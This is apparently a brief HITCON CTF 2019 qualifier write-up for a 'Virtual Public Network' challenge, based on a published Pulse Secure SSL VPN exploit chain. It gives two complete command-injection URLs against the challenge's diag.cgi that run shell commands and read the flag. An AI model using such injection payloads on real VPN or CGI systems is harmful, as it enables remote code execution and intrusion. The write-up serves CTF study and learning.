# Virtual Public Network Search `DSSafe.pm` will get [this article](https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/) from Orange (as expected). Apply copy-oriented programming technique and get `http://13.231.137.9/cgi-bin/diag.cgi?options=-r$x="ls /",system$x%23 2>./tmp/0range.thtml <&tpl=0range` The filename of the flag reader contains special character `$`. So, apply genetic algorithm-based mutation technology and get `http://13.231.137.9/cgi-bin/diag.cgi?options=-r$x="system ' /\x2aREAD_FLAG\x2a'",eval$x%23 2>./tmp/0range.thtml <&tpl=0range` Basically it runs `eval` instead of `system` for easier encoding handling. ###### tags: `HITCON CTF 2019 Quals`